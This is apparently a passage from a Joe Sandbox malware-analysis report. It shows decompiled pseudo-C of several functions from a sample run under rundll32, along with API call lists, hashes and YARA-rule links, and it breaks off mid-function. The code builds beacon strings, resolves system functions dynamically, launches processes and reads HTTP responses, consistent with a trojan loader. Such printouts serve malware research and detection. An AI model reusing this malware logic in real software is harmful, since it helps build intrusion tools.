                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: 71cd24309a9a8eee072809def228e37ed9bd4b1de42ad18bb195640c1c01c01a
                                • Instruction ID: 8f0f7a25fee8edb6c5e0221d2014a76bd59ed8716f93ac572af61c91dfea0a30
                                • Opcode Fuzzy Hash: 71cd24309a9a8eee072809def228e37ed9bd4b1de42ad18bb195640c1c01c01a
                                • Instruction Fuzzy Hash: 59816374B33106AEE710FBB8ED88D6F76ADDB48700764491DA405D71C9EE39F9458B20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04285450, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E04285450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x428d018; // 0xefcf766a
				asm("bswap eax");
				_t61 =  *0x428d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x428d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E0428D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x428d2a8; // 0xaea5a8
				_t3 = _t64 + 0x428e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x428d02c,  *0x428d004, _t59);
				_t67 = E04283288();
				_t68 =  *0x428d2a8; // 0xaea5a8
				_t4 = _t68 + 0x428e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E0428831C(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x428d2a8; // 0xaea5a8
					_t7 = _t126 + 0x428e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x428d238, 0, _v8);
				}
				_t73 = E04289267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x428d2a8; // 0xaea5a8
					_t11 = _t121 + 0x428e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x428d238, 0, _v8);
				}
				_t146 =  *0x428d32c; // 0x4d795b0
				_t75 = E0428284E(0x428d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x428d238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x428d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x428d238, _t152, _v20);
						goto L26;
					}
					E04283239(GetTickCount());
					_t82 =  *0x428d32c; // 0x4d795b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x428d32c; // 0x4d795b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x428d32c; // 0x4d795b0
					_t148 = E04287B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x428d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x428c28c);
					_push(_t148);
					_t94 = E0428A677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x428d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04287B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04285433();
						L22:
						HeapFree( *0x428d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E04289F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E0428137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E04288B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04287953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04288B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                0x04285450
                                0x04285450
                                0x04285450
                                0x04285459
                                0x04285462
                                0x04285464
                                0x04285464
                                0x04285471
                                0x0428547c
                                0x0428547f
                                0x04285484
                                0x0428548d
                                0x04285490
                                0x04285495
                                0x04285498
                                0x0428549d
                                0x042854a0
                                0x042854ac
                                0x042854b9
                                0x042854bb
                                0x042854c1
                                0x042854c6
                                0x042854d1
                                0x042854d3
                                0x042854d6
                                0x042854d8
                                0x042854dd
                                0x042854e3
                                0x042854e8
                                0x042854eb
                                0x042854f0
                                0x042854fd
                                0x042854ff
                                0x04285505
                                0x0428550f
                                0x0428550f
                                0x04285511
                                0x04285516
                                0x0428551b
                                0x0428551e
                                0x04285523
                                0x04285530
                                0x04285532
                                0x04285540
                                0x04285540
                                0x04285542
                                0x04285550
                                0x04285555
                                0x04285557
                                0x0428555c
                                0x0428571d
                                0x04285727
                                0x04285730
                                0x04285562
                                0x0428556e
                                0x04285574
                                0x04285579
                                0x04285711
                                0x0428571b
                                0x00000000
                                0x0428571b
                                0x04285585
                                0x0428558a
                                0x04285593
                                0x042855a4
                                0x042855a8
                                0x042855b1
                                0x042855b7
                                0x042855c6
                                0x042855cd
                                0x042855d6
                                0x042855dc
                                0x04285705
                                0x0428570f
                                0x00000000
                                0x0428570f
                                0x042855e8
                                0x042855ee
                                0x042855ef
                                0x042855f4
                                0x042855f9
                                0x042856fb
                                0x04285703
                                0x00000000
                                0x04285703
                                0x04285602
                                0x04285609
                                0x04285611
                                0x04285616
                                0x0428561f
                                0x0428562a
                                0x0428562f
                                0x04285634
                                0x04285733
                                0x042856e7
                                0x042856e7
                                0x042856ec
                                0x042856f7
                                0x042856f9
                                0x00000000
                                0x042856f9
                                0x0428563e
                                0x04285643
                                0x04285648
                                0x0428564d
                                0x0428565d
                                0x04285660
                                0x04285666
                                0x0428566c
                                0x04285672
                                0x04285675
                                0x0428567b
                                0x0428567e
                                0x04285683
                                0x04285687
                                0x04285687
                                0x04285693
                                0x0428569f
                                0x042856a3
                                0x042856a5
                                0x042856aa
                                0x042856ac
                                0x042856b1
                                0x042856b6
                                0x042856c3
                                0x042856cb
                                0x042856ce
                                0x042856ce
                                0x042856aa
                                0x00000000
                                0x04285695
                                0x04285699
                                0x042856d0
                                0x042856d3
                                0x042856dc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x042856dc
                                0x0428569b
                                0x00000000
                                0x0428569b
                                0x04285693

                                APIs
                                • GetTickCount.KERNEL32 ref: 04285464
                                • wsprintfA.USER32 ref: 042854B4
                                • wsprintfA.USER32 ref: 042854D1
                                • wsprintfA.USER32 ref: 042854FD
                                • HeapFree.KERNEL32(00000000,?), ref: 0428550F
                                • wsprintfA.USER32 ref: 04285530
                                • HeapFree.KERNEL32(00000000,?), ref: 04285540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0428556E
                                • GetTickCount.KERNEL32 ref: 0428557F
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04285593
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 042855B1
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?,04D795B0), ref: 04287BB8
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(?,?,?,04289DA0,?,04D795B0), ref: 04287BC0
                                  • Part of subcall function 04287B8D: strcpy.NTDLL ref: 04287BD7
                                  • Part of subcall function 04287B8D: lstrcat.KERNEL32(00000000,?), ref: 04287BE2
                                  • Part of subcall function 04287B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04289DA0,?,04D795B0), ref: 04287BFF
                                • StrTrimA.SHLWAPI(00000000,0428C28C,?,04D795B0), ref: 042855E8
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(04D79B08,00000000,00000000,7691C740,04289DCB,00000000), ref: 0428A687
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(?), ref: 0428A68F
                                  • Part of subcall function 0428A677: lstrcpy.KERNEL32(00000000,04D79B08), ref: 0428A6A3
                                  • Part of subcall function 0428A677: lstrcat.KERNEL32(00000000,?), ref: 0428A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04285609
                                • lstrcpy.KERNEL32(?,?), ref: 04285611
                                • lstrcat.KERNEL32(?,?), ref: 0428561F
                                • lstrcat.KERNEL32(?,00000000), ref: 04285625
                                  • Part of subcall function 04287B3B: lstrlen.KERNEL32(?,00000000,04D79D18,00000000,04285142,04D79F3B,?,?,?,?,?,69B25F44,00000005,0428D00C), ref: 04287B42
                                  • Part of subcall function 04287B3B: mbstowcs.NTDLL ref: 04287B6B
                                  • Part of subcall function 04287B3B: memset.NTDLL ref: 04287B7D
                                • wcstombs.NTDLL ref: 042856B6
                                  • Part of subcall function 0428137B: SysAllocString.OLEAUT32(?), ref: 042813B6
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 042856F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04285703
                                • HeapFree.KERNEL32(00000000,?,?,04D795B0), ref: 0428570F
                                • HeapFree.KERNEL32(00000000,?), ref: 0428571B
                                • HeapFree.KERNEL32(00000000,?), ref: 04285727
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: fd70e7f037c0b4fe2cf3e0063fddf89d9e2df7b19de4c331a554c381ba16aea0
                                • Instruction ID: 39722943ee101726bc65dcb5808675ad908ea3782052cf18cdee0bcf0b1e1f04
                                • Opcode Fuzzy Hash: fd70e7f037c0b4fe2cf3e0063fddf89d9e2df7b19de4c331a554c381ba16aea0
                                • Instruction Fuzzy Hash: EB917A71A12119FFDB11AFA9EC48A9EBBB9EF08354F144018F404D72A0DB35ED55DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04283485, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E04283485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04284944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0428A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x428d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x428d2a8; // 0xaea5a8
					_t18 = _t47 + 0x428e3e6; // 0x73797325
					_t68 = E04287912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x428d2a8; // 0xaea5a8
						_t19 = _t50 + 0x428e747; // 0x4d78cef
						_t20 = _t50 + 0x428e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04283179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04283179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x428d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04288B22(_t70);
				goto L12;
			}


















                                0x0428348d
                                0x0428348d
                                0x0428349c
                                0x042834a3
                                0x042834a8
                                0x042835b5
                                0x042835bc
                                0x042835bc
                                0x042834b7
                                0x042834bf
                                0x042834c2
                                0x042834c7
                                0x042834dc
                                0x042834e2
                                0x042834e3
                                0x042834e6
                                0x042834ec
                                0x042834ef
                                0x042834f4
                                0x042834fc
                                0x04283508
                                0x0428350c
                                0x0428359c
                                0x04283512
                                0x04283512
                                0x04283517
                                0x0428351e
                                0x04283532
                                0x04283536
                                0x04283585
                                0x04283538
                                0x04283539
                                0x04283540
                                0x04283559
                                0x0428355b
                                0x0428355f
                                0x04283566
                                0x04283580
                                0x04283568
                                0x04283571
                                0x04283576
                                0x04283576
                                0x04283566
                                0x04283594
                                0x04283594
                                0x0428350c
                                0x042835a3
                                0x042835ac
                                0x042835b0
                                0x00000000

                                APIs
                                  • Part of subcall function 04284944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,042834A1,?,00000001,?,?,00000000,00000000), ref: 04284969
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0428498B
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 042849A1
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042849B7
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042849CD
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042849E3
                                • memset.NTDLL ref: 042834EF
                                  • Part of subcall function 04287912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04283508,73797325), ref: 04287923
                                  • Part of subcall function 04287912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0428793D
                                • GetModuleHandleA.KERNEL32(4E52454B,04D78CEF,73797325), ref: 04283525
                                • GetProcAddress.KERNEL32(00000000), ref: 0428352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04283594
                                  • Part of subcall function 04283179: GetProcAddress.KERNEL32(36776F57,04288BDC), ref: 04283194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 04283571
                                • CloseHandle.KERNEL32(?), ref: 04283576
                                • GetLastError.KERNEL32(00000001), ref: 0428357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 3abd06cba02d9bb6750e08a85b407db9f743942bc151a2e957587f48acbabd61
                                • Instruction ID: 028b2f749ac99c434c26cb1c61ff2c401780215ba9645c696024e8697f308afa
                                • Opcode Fuzzy Hash: 3abd06cba02d9bb6750e08a85b407db9f743942bc151a2e957587f48acbabd61
                                • Instruction Fuzzy Hash: 3D3172B1A11209AFDB10FFA4DC88D9EBBBCEB08754F00446DE905E7151D739AE48DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04288F85, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E04288F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x428d33c; // 0x4d79bc0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04289B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x428c18c;
				}
				_t46 = E04287F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04281525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x428d2a8; // 0xaea5a8
						_t16 = _t75 + 0x428eb08; // 0x530025
						 *0x428d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04289B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x428c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04281525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04288B22(_v20);
						} else {
							_t66 =  *0x428d2a8; // 0xaea5a8
							_t31 = _t66 + 0x428ec28; // 0x73006d
							 *0x428d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04288B22(_v12);
				}
				return _v24;
			}




























                                0x04288f8d
                                0x04288f93
                                0x04288f9a
                                0x04288fa0
                                0x04288fa4
                                0x04288fa8
                                0x04288fab
                                0x04288fb0
                                0x04288fb5
                                0x04288fb7
                                0x04288fb7
                                0x04288fc0
                                0x04288fc5
                                0x04288fca
                                0x04288fd0
                                0x04288fda
                                0x04288fe3
                                0x04288fea
                                0x04289003
                                0x04289008
                                0x0428900d
                                0x04289016
                                0x0428901f
                                0x04289030
                                0x04289039
                                0x0428903d
                                0x04289041
                                0x04289046
                                0x0428904b
                                0x0428904d
                                0x0428904d
                                0x04289057
                                0x04289060
                                0x04289067
                                0x0428907f
                                0x04289083
                                0x042890c0
                                0x04289085
                                0x04289088
                                0x04289090
                                0x042890a1
                                0x042890ad
                                0x042890b5
                                0x042890b9
                                0x042890b9
                                0x04289083
                                0x042890c8
                                0x042890cd
                                0x042890d4

                                APIs
                                • GetTickCount.KERNEL32 ref: 04288F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 04288FDA
                                • lstrlen.KERNEL32(00000000), ref: 04288FE3
                                • lstrlen.KERNEL32(00000000), ref: 04288FEA
                                • lstrlenW.KERNEL32(80000002), ref: 04288FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 04289057
                                • lstrlen.KERNEL32(?), ref: 04289060
                                • lstrlen.KERNEL32(?), ref: 04289067
                                • lstrlenW.KERNEL32(?), ref: 0428906E
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: b74381fb8f573c5550b520b16f21fbaefefc917fbd8909ace1123da108344587
                                • Instruction ID: 75a52d4f362cddd8b45d1fbad8d739e95cb1e2177399d12111cfae7e28484f3c
                                • Opcode Fuzzy Hash: b74381fb8f573c5550b520b16f21fbaefefc917fbd8909ace1123da108344587
                                • Instruction Fuzzy Hash: E9419C72A01209FBDF11AFA4DC489DEBBB5EF44358F014058E904A7290DB35EA54DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 042857DD, Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E042857DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04281525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E04288B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E042829C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                0x042857dd
                                0x042857dd
                                0x042857ed
                                0x042857f0
                                0x042857f4
                                0x042857fa
                                0x042857ff
                                0x04285818
                                0x0428582c
                                0x04285833
                                0x0428583a
                                0x0428588d
                                0x04285893
                                0x04285899
                                0x042858d4
                                0x042858da
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04285899
                                0x04285840
                                0x00000000
                                0x04285847
                                0x04285855
                                0x04285858
                                0x0428585b
                                0x04285867
                                0x0428586b
                                0x042858cd
                                0x0428586d
                                0x0428587f
                                0x042858bd
                                0x042858c8
                                0x04285881
                                0x04285884
                                0x04285888
                                0x04285888
                                0x0428587f
                                0x00000000
                                0x0428586b
                                0x04285840
                                0x04285804
                                0x0428580a
                                0x0428580d
                                0x04285812
                                0x00000000
                                0x00000000
                                0x00000000
                                0x042858a2
                                0x042858aa
                                0x042858af
                                0x042858b2
                                0x00000000

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 042857F4
                                • SetEvent.KERNEL32(?), ref: 04285804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04285836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428587B
                                • GetLastError.KERNEL32 ref: 0428588D
                                  • Part of subcall function 042829C0: WaitForMultipleObjects.KERNEL32(00000002,0428A923,00000000,0428A923,?,?,?,0428A923,0000EA60), ref: 042829DB
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • GetLastError.KERNEL32(00000000), ref: 042858C2
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: cef23df63f93161d6fe02e369f4bc3172f6aca312356326467c13833205cfc03
                                • Instruction ID: 52bd490fec32245a7caed60c7d41c232a2407f1f9295e3142691d442f742d041
                                • Opcode Fuzzy Hash: cef23df63f93161d6fe02e369f4bc3172f6aca312356326467c13833205cfc03
                                • Instruction Fuzzy Hash: 1C312FB5A1120DFFDB20EFA5D88499EB7F8EF04344F10496EE502A2190D774BA849F60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04287B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 63%
                                			E04287B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x428d2a8; // 0xaea5a8
				_t1 = _t9 + 0x428e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E0428A055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04281525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04281188(_t34, _t41, _a8);
						E04288B22(_t41);
